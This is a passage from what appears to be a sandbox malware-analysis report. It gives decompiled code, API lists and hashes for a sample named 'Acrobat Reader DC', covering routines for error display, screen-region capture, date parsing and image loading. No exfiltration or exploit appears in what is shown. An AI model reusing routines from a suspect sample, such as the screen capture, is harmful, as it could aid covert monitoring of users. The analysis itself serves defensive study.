					_t113 = _t83;
					if(_t83 != 0) {
						_push(_t83);
						_t93 =  &_v8272;
						E0041329B( &_v8272,  &_v8272, L"Line %d  (File \"%s\"):\n\n", _t106);
					} else {
						E0041329B(_t93, _t96, L"Line %d:\n\n", _t106);
					}
					E00401B10( &_v8272,  &_v24, _t113);
					_t108 = _a4;
					E0040D200( &_v24, _t85, _t108, _t117);
					E0040D200( &_v24, _t85, "\n", _t117);
					_t86 =  &_v44;
					E0040BC70( &_v44, _t113);
					_t100 = _a12;
					if(_a12 >= 0) {
						E00402160( &_v44, _t108, _t93, _t100);
						E0040C600( &_v44 | 0xffffffff,  &_v44, _t100);
						E0040D200( &_v44,  &_v44, L"^ ERROR", _t117);
						_t86 =  &_v44;
						E0040BD50( &_v24, _t117,  &_v44);
						E0040D200( &_v24,  &_v44, "\n", _t117);
						_t83 = _a8;
					}
					E0040D200( &_v24, _t86, L"\nError: ", _t117);
					E0040BD50( &_v24, _t117,  &_v60);
					_t116 =  *0x4a90eb;
					if( *0x4a90eb == 0) {
						MessageBoxW(0, _v24, _v76, 0x11010);
					} else {
						_push(_v44);
						_push(_t108);
						_push(_v60);
						_push(_v28);
						_push(_t83);
						_push(L"%s (%d) : ==> %s: \n%s \n%s\n");
						E00413ABE(_t83, _v28, L"\nError: ", _t108, _t116);
					}
					E00402250( &_v44);
					E00402250( &_v24);
					E00402250( &_v60);
					return E00402250( &_v76);
				}
				return _t38;
			}





















                                  0x00460879
                                  0x00460879
                                  0x00460881
                                  0x00460887
                                  0x0046088c
                                  0x0046088e
                                  0x00460894
                                  0x004608b0
                                  0x004608b6
                                  0x004608bf
                                  0x004608d7
                                  0x004608e0
                                  0x004608ec
                                  0x004608ef
                                  0x004608f4
                                  0x004608f7
                                  0x00460905
                                  0x00460907
                                  0x0046090a
                                  0x0046090c
                                  0x0046091f
                                  0x00460921
                                  0x0046092d
                                  0x0046090e
                                  0x00460915
                                  0x0046091a
                                  0x0046093e
                                  0x00460943
                                  0x0046094b
                                  0x00460958
                                  0x0046095d
                                  0x00460960
                                  0x00460965
                                  0x0046096a
                                  0x00460971
                                  0x0046097e
                                  0x0046098b
                                  0x00460990
                                  0x00460997
                                  0x004609a4
                                  0x004609a9
                                  0x004609a9
                                  0x004609b4
                                  0x004609c0
                                  0x004609c5
                                  0x004609cc
                                  0x004609fa
                                  0x004609ce
                                  0x004609d7
                                  0x004609d8
                                  0x004609d9
                                  0x004609da
                                  0x004609db
                                  0x004609dc
                                  0x004609e1
                                  0x004609e6
                                  0x00460a03
                                  0x00460a0b
                                  0x00460a13
                                  0x00000000
                                  0x00460a1b
                                  0x00460a26

                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                  • __swprintf.LIBCMT ref: 00460915
                                  • __swprintf.LIBCMT ref: 0046092D
                                  • _wprintf.LIBCMT ref: 004609E1
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                  • API String ID: 3631882475-2268648507
                                  • Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                  • Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E004313CA(int _a4, int _a8, void* _a12, char _a15, intOrPtr* _a16) {
				char _v5;
				struct HBITMAP__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v52;
				struct HWND__* _v56;
				intOrPtr _v60;
				signed int _v64;
				int _v68;
				struct tagBITMAPINFO _v72;
				void* __edi;
				void* __esi;
				int _t60;
				intOrPtr _t64;
				void* _t71;
				int _t72;
				intOrPtr _t77;
				void* _t78;
				int _t79;
				int _t91;
				int _t94;
				intOrPtr _t96;
				int _t98;
				int _t105;
				intOrPtr _t108;
				int _t109;
				int _t114;
				struct HDC__* _t115;
				struct HDC__* _t116;
				int* _t119;
				int _t120;
				void* _t121;

				_t119 = _a12;
				_t60 = _t119[2];
				_t94 =  *_t119;
				_t105 = _t119[1];
				_t114 = _t119[3];
				_a15 = _t60 - _t94 < 0;
				_v5 = _t114 - _t105 < 0;
				if(_a15 != 0) {
					 *_t119 = _t60;
					_t119[2] = _t94;
				}
				if(_v5 != 0) {
					_t119[1] = _t114;
					_t119[3] = _t105;
				}
				E0043137E( *((intOrPtr*)(_a4 + 0x104)),  &_v28, _a8);
				_t64 = _v28;
				 *_t119 =  *_t119 + _t64;
				_t119[2] = _t119[2] + _t64;
				_t96 = _v24;
				_t119[3] = _t119[3] + _t96;
				_t119[1] = _t119[1] + _t96;
				_a8 = _t119[2] -  *_t119 + 1;
				_t91 = _t119[3] - _t119[1] + 1;
				_t115 = GetDC(0);
				_v16 = _t115;
				_v12 = CreateCompatibleBitmap(_t115, _a8, _t91);
				_t116 = CreateCompatibleDC(_t115);
				_t71 = SelectObject(_t116, _v12);
				_t108 = _v5;
				_v20 = _t71;
				_t98 = _t91;
				if(_t108 != 0) {
					_t98 =  ~_t98;
				}
				_t72 = _a8;
				if(_a15 != 0) {
					_t72 =  ~_t72;
				}
				if(_t108 == 0) {
					_t109 = _t119[1];
				} else {
					_t109 = _t119[3];
				}
				_t132 = _a15;
				_a4 = _t109;
				if(_a15 == 0) {
					_t120 =  *_t119;
				} else {
					_t120 = _t119[2];
				}
				StretchBlt(_t116, 0, 0, _a8, _t91, _v16, _t120, _a4, _t72, _t98, 0xcc0020);
				_t121 = _v12;
				_v64 =  ~_t91;
				_v72.bmiHeader = 0x28;
				_v68 = _a8;
				_v60 = 0x200001;
				_v56 = 0;
				GetDIBits(_t116, _t121, 0, 0, 0,  &_v72, 0);
				_t77 = _v52;
				_push(_t77);
				 *_a16 = _t77;
				_t78 = E004115D7(_t116, _t121, _t132);
				_a12 = _t78;
				_t79 = GetDIBits(_t116, _t121, 0, _t91, _t78,  &_v72, 0);
				SelectObject(_t116, _v20);
				DeleteObject(_t121);
				DeleteDC(_t116);
				ReleaseDC(0, _v16);
				if(_t79 == 0) {
					_push(_a12);
					E004111DC();
					__eflags = 0;
					return 0;
				} else {
					return _a12;
				}
			}





































                                  0x004313d2
                                  0x004313d5
                                  0x004313d8
                                  0x004313da
                                  0x004313e0
                                  0x004313e3
                                  0x004313e9
                                  0x004313f1
                                  0x004313f3
                                  0x004313f5
                                  0x004313f5
                                  0x004313fc
                                  0x004313fe
                                  0x00431401
                                  0x00431401
                                  0x00431416
                                  0x0043141b
                                  0x0043141e
                                  0x00431420
                                  0x00431423
                                  0x00431429
                                  0x00431431
                                  0x0043143a
                                  0x0043143d
                                  0x00431448
                                  0x0043144c
                                  0x00431456
                                  0x00431462
                                  0x00431466
                                  0x0043146c
                                  0x0043146f
                                  0x00431472
                                  0x00431476
                                  0x00431478
                                  0x00431478
                                  0x0043147e
                                  0x00431481
                                  0x00431483
                                  0x00431483
                                  0x00431487
                                  0x0043148e
                                  0x00431489
                                  0x00431489
                                  0x00431489
                                  0x00431491
                                  0x00431495
                                  0x00431498
                                  0x004314b0
                                  0x0043149a
                                  0x0043149a
                                  0x0043149a
                                  0x004314cc
                                  0x004314d2
                                  0x004314de
                                  0x004314ed
                                  0x004314f4
                                  0x004314f7
                                  0x004314fe
                                  0x00431505
                                  0x0043150b
                                  0x00431511
                                  0x00431512
                                  0x00431514
                                  0x00431528
                                  0x0043152b
                                  0x00431538
                                  0x0043153f
                                  0x00431546
                                  0x00431552
                                  0x0043155d
                                  0x004314a2
                                  0x004314a3
                                  0x004314a8
                                  0x004314ad
                                  0x00431563
                                  0x00431569
                                  0x00431569

                                  APIs
                                  • GetDC.USER32(00000000), ref: 0043143E
                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 3300687185-3887548279
                                  • Opcode ID: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 606d77b4f1bde06d9a9935c8edd261f35aeb593e5eea415e727307547a522621
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00432A10(void* __ecx, short* _a4, struct _SYSTEMTIME* _a8, char _a12, signed int _a16) {
				short _v8;
				short _v12;
				char _v16;
				void* _t43;
				WORD _t48;
				WORD _t52;
				short _t60;
				void* _t61;
				WORD _t64;
				void* _t65;
				WORD _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				struct _SYSTEMTIME* _t85;
				short* _t86;
				void* _t87;
				void* _t89;
				void* _t90;

				_t70 = _a16;
				_t86 = _a4;
				_t85 = _a8;
				GetLocalTime(_t85);
				if( *_t86 == 0) {
					L12:
					return 0;
				} else {
					_t43 = E004111C1(_t86);
					_t90 = _t89 + 4;
					if(_t43 < 4) {
						goto L12;
					} else {
						if(_a12 != 0) {
							E00412FBA( &_v16, _t86, 4);
							_push( &_v16);
							_v8 = 0;
							_t60 = E00413190();
							_t86 = _t86 + 8 + _t70 * 2;
							_t85->wYear = _t60;
							_t61 = E004111C1(_t86);
							_t90 = _t90 + 0x14;
							if(_t61 >= 2) {
								E00412FBA( &_v16, _t86, 2);
								_push( &_v16);
								_v12 = 0;
								_t64 = E00413190();
								_t86 = _t86 + 4 + _t70 * 2;
								_t85->wMonth = _t64;
								_t65 = E004111C1(_t86);
								_t90 = _t90 + 0x14;
								if(_t65 >= 2) {
									E00412FBA( &_v16, _t86, 2);
									_push( &_v16);
									_v12 = 0;
									_t68 = E00413190();
									_t86 = _t86 + 4;
									_t85->wDay = _t68;
									_t69 = E004111C1(_t86);
									_t90 = _t90 + 0x14;
									if(_t69 != 0) {
										_t86 = _t86 + _t70 * 2;
									}
								}
							}
						}
						if(E004111C1(_t86) >= 2) {
							E00412FBA( &_v16, _t86, 2);
							_push( &_v16);
							_v12 = 0;
							_t48 = E00413190();
							_t87 = _t86 + 4 + _t70 * 2;
							_t85->wHour = _t48;
							_t71 = _t70 + _t70 + 4;
							if(E004111C1(_t87) >= 2) {
								E00412FBA( &_v16, _t87, 2);
								_push( &_v16);
								_v12 = 0;
								_t52 = E00413190();
								_t88 = _t87 + _t71;
								_t85->wMinute = _t52;
								if(E004111C1(_t87 + _t71) >= 2) {
									E00412FBA( &_v16, _t88, 2);
									_push( &_v16);
									_v12 = 0;
									_t85->wSecond = E00413190();
									_t85->wMilliseconds = 0;
								}
							}
						}
						return 1;
					}
				}
			}






















                                  0x00432a17
                                  0x00432a1b
                                  0x00432a1f
                                  0x00432a23
                                  0x00432a2d
                                  0x00432b8b
                                  0x00432b91
                                  0x00432a33
                                  0x00432a34
                                  0x00432a39
                                  0x00432a3f
                                  0x00000000
                                  0x00432a45
                                  0x00432a49
                                  0x00432a56
                                  0x00432a60
                                  0x00432a61
                                  0x00432a65
                                  0x00432a6a
                                  0x00432a6f
                                  0x00432a72
                                  0x00432a77
                                  0x00432a7d
                                  0x00432a86
                                  0x00432a90
                                  0x00432a91
                                  0x00432a95
                                  0x00432a9a
                                  0x00432a9f
                                  0x00432aa3
                                  0x00432aa8
                                  0x00432aae
                                  0x00432ab7
                                  0x00432ac1
                                  0x00432ac2
                                  0x00432ac6
                                  0x00432acb
                                  0x00432acf
                                  0x00432ad3
                                  0x00432ad8
                                  0x00432add
                                  0x00432adf
                                  0x00432adf
                                  0x00432add
                                  0x00432aae
                                  0x00432a7d
                                  0x00432aee
                                  0x00432afb
                                  0x00432b05
                                  0x00432b06
                                  0x00432b0a
                                  0x00432b0f
                                  0x00432b14
                                  0x00432b18
                                  0x00432b27
                                  0x00432b30
                                  0x00432b3a
                                  0x00432b3b
                                  0x00432b3f
                                  0x00432b44
                                  0x00432b47
                                  0x00432b56
                                  0x00432b5f
                                  0x00432b69
                                  0x00432b6a
                                  0x00432b76
                                  0x00432b7c
                                  0x00432b7c
                                  0x00432b56
                                  0x00432b27
                                  0x00432b88
                                  0x00432b88
                                  0x00432a3f

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0043009D(struct HWND__** _a4, void* _a8, int* _a12, int* _a16) {
				int _v8;
				void* _v12;
				long _v16;
				int _v32;
				int _v36;
				void _v40;
				WCHAR* _t27;
				void* _t28;
				long _t29;
				intOrPtr* _t42;
				intOrPtr* _t46;
				int* _t50;
				int _t53;
				long _t57;
				int* _t63;
				void* _t76;
				struct HWND__** _t79;
				struct HWND__* _t80;
				void* _t82;

				_t27 = _a8;
				if( *_t27 == 0) {
					_a8 = 0;
					goto L10;
				} else {
					_t76 = CreateFileW(_t27, 0x80000000, 0, 0, 3, 0, 0);
					if(_t76 != 0xffffffff) {
						_t57 = GetFileSize(_t76, 0);
						_t82 = GlobalAlloc(2, _t57);
						if(_t82 == 0) {
							goto L2;
						} else {
							ReadFile(_t76, GlobalLock(_t82), _t57,  &_v16, 0);
							GlobalUnlock(_t82);
							CloseHandle(_t76);
							__imp__CreateStreamOnHGlobal(_t82, 1,  &_v12);
							_v8 = 0;
							__imp__#418(_v12, 0, 0, 0x4829f8,  &_v8);
							_t42 = _v12;
							 *((intOrPtr*)( *((intOrPtr*)( *_t42 + 8))))(_t42);
							GlobalFree(_t82);
							_t46 = _v8;
							if(_t46 == 0) {
								goto L2;
							} else {
								 *((intOrPtr*)( *((intOrPtr*)( *_t46 + 0xc))))(_t46,  &_a8);
								GetObjectW(_a8, 0x18,  &_v40);
								_t63 = _a12;
								_t50 = _a16;
								if( *_t63 == 0 &&  *_t50 == 0) {
									 *_t63 = _v36;
									 *_t50 = _v32;
								}
								_a8 = CopyImage(_a8, 0,  *_t63,  *_t50, 0x2000);
								_t53 = _v8;
								 *((intOrPtr*)( *((intOrPtr*)( *_t53 + 8))))(_t53);
								L10:
								_t79 = _a4;
								_t28 = _t79[0x18];
								if(_t28 != 0) {
									DeleteObject(_t28);
								}
								_t29 = _a8;
								_t79[0x18] = _t29;
								_t80 =  *_t79;
								SendMessageW(_t80, 0x172, 0, _t29);
								return _t80;
							}
						}
					} else {
						L2:
						return 0;
					}
				}
			}






















                                  0x004300a0
                                  0x004300ad
                                  0x004301be
                                  0x00000000
                                  0x004300b3
                                  0x004300c9
                                  0x004300ce
                                  0x004300e4
                                  0x004300ef
                                  0x004300f3
                                  0x00000000
                                  0x004300f5
                                  0x00430105
                                  0x0043010c
                                  0x00430113
                                  0x00430120
                                  0x00430137
                                  0x0043013e
                                  0x00430144
                                  0x0043014d
                                  0x00430150
                                  0x00430156
                                  0x0043015b
                                  0x00000000
                                  0x00430161
                                  0x0043016b
                                  0x00430177
                                  0x0043017d
                                  0x00430183
                                  0x00430186
                                  0x00430190
                                  0x00430195
                                  0x00430195
                                  0x004301ae
                                  0x004301b1
                                  0x004301ba
                                  0x004301c5
                                  0x004301c5
                                  0x004301c8
                                  0x004301cd
                                  0x004301d0
                                  0x004301d0
                                  0x004301d6
                                  0x004301dc
                                  0x004301df
                                  0x004301e7
                                  0x004301f5
                                  0x004301f5
                                  0x0043015b
                                  0x004300d0
                                  0x004300d0
                                  0x004300d8
                                  0x004300d8
                                  0x004300ce

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32 ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32 ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32 ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E00445BE4(void* __eflags, struct HWND__** _a4, intOrPtr* _a8) {
				short _v520;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				struct HWND__* _t23;
				intOrPtr* _t27;

				_t27 = _a8;
				_t23 = GetParent( *_a4);
				GetClassNameW(_t23,  &_v520, 0x100);
				if(E0041313C( &_v520, L"SHELLDLL_DefView") != 0) {
					return 0;
				} else {
					_t12 = E004114AB(_t23,  *_t27, L"largeicons");
					if(_t12 != 0) {
						_t14 = E004114AB(_t23,  *_t27, L"details");
						if(_t14 != 0) {
							_t16 = E004114AB(_t23,  *_t27, L"smallicons");
							if(_t16 != 0) {
								_t17 = E004114AB(_t23,  *_t27, L"list");
								if(_t17 == 0) {
									_push(_t17);
									_push(0x702b);
									goto L10;
								}
							} else {
								_push(_t16);
								_push(0x702a);
								goto L10;
							}
						} else {
							_push(_t14);
							_push(0x702c);
							goto L10;
						}
					} else {
						_push(_t12);
						_push(0x7029);
						L10:
						SendMessageW(_t23, 0x111, ??, ??);
					}
					return 1;
				}
			}











                                  0x00445bf3
                                  0x00445c09
                                  0x00445c0d
                                  0x00445c29
                                  0x00445c86
                                  0x00445c2b
                                  0x00445c33
                                  0x00445c3d
                                  0x00445c4f
                                  0x00445c59
                                  0x00445c6b
                                  0x00445c75
                                  0x00445c91
                                  0x00445c9b
                                  0x00445c9d
                                  0x00445c9e
                                  0x00000000
                                  0x00445c9e
                                  0x00445c77
                                  0x00445c77
                                  0x00445c78
                                  0x00000000
                                  0x00445c78
                                  0x00445c5b
                                  0x00445c5b
                                  0x00445c5c
                                  0x00000000
                                  0x00445c5c
                                  0x00445c3f
                                  0x00445c3f
                                  0x00445c40
                                  0x00445ca3
                                  0x00445ca9
                                  0x00445ca9
                                  0x00445cb6
                                  0x00445cb6

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E004491B9(void* __eflags, void* __fp0, WCHAR* _a4, signed int _a6, signed int _a8, long _a12) {
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				signed int _v28;
				int _v32;
				long _v52;
				long _v64;
				long _v68;
				int _v72;
				char _v88;
				WCHAR* _v108;
				void* _v120;
				struct tagMENUITEMINFOW _v168;
				WCHAR* _v184;
				void* _v192;
				long _v208;
				void* _v220;
				long _v244;
				long _v256;
				int _v260;
				void* _v8456;
				signed int _t138;
				struct HWND__** _t159;
				intOrPtr _t161;
				intOrPtr _t168;
				long _t169;
				struct HWND__* _t175;
				WCHAR* _t176;

				E00422240(0x2108);
				_t176 = _a8;
				_v24 = 0;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_v28) == 0) {
					L13:
					__eflags = 0;
					return 0;
				} else {
					_t161 =  *0x4a8690; // 0x0
					_t168 =  *0x4a86a4; // 0xa71980
					_t159 =  *( *(_t168 + _v28 * 4));
					_t138 = _t159[0x22] & 0x000000ff;
					_t175 =  *_t159;
					_a8 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + _a8 * 4))));
					if(_t138 > 3) {
						_t169 = _a12;
						__eflags = _t169;
						if(__eflags == 0) {
							goto L7;
						} else {
							__eflags =  *_t169;
							if(__eflags != 0) {
								goto L13;
							} else {
								goto L7;
							}
						}
					} else {
						switch( *((intOrPtr*)(_t138 * 4 +  &M004497C5))) {
							case 0:
								_v24 = 0x143;
								_v16 = 0x158;
								_v12 = 0x14e;
								_v20 = 0x14b;
								goto L7;
							case 1:
								_v24 = 0x180;
								_v16 = 0x1a2;
								_v12 = 0x186;
								_v20 = 0x184;
								goto L7;
							case 2:
								L7:
								if(_t138 > 0x1c) {
									L66:
									__eflags = _t176;
									if(_t176 == 0) {
										goto L10;
									} else {
										_t140 = SetWindowTextW(_t175, _t176);
										__eflags = _t140;
										if(_t140 == 0) {
											goto L13;
										} else {
											E00430B87(_a8, _t159, 1);
											goto L69;
										}
									}
								} else {
									switch( *((intOrPtr*)(( *(_t138 + 0x44980d) & 0x000000ff) * 4 +  &M004497D5))) {
										case 0:
											if(_t176 != 0) {
												_t144 = SendMessageW(_t175, _v16, 0xffffffff, _t176);
